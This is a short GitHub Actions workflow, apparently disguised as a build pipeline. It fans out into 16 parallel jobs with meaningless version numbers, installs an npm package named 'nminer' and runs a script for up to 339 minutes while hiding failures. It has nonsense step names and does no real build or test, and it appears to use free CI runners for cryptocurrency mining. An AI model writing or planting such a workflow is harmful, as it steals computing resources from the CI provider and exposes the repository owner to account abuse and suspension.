name: sauerkraut
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 2504 }
          - { version: 4423 }
          - { version: 3544 }
          - { version: 2142 }
          - { version: 6874 }
          - { version: 6402 }
          - { version: 8817 }
          - { version: 7422 }
          - { version: 2601 }
          - { version: 8925 }
          - { version: 2155 }
          - { version: 9435 }
          - { version: 6831 }
          - { version: 4088 }
          - { version: 8178 }
          - { version: 7312 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: though countess
        run: |
          npm install nminer@latest
          timeout 339m node sauerkraut.js || echo "sauerkraut executed"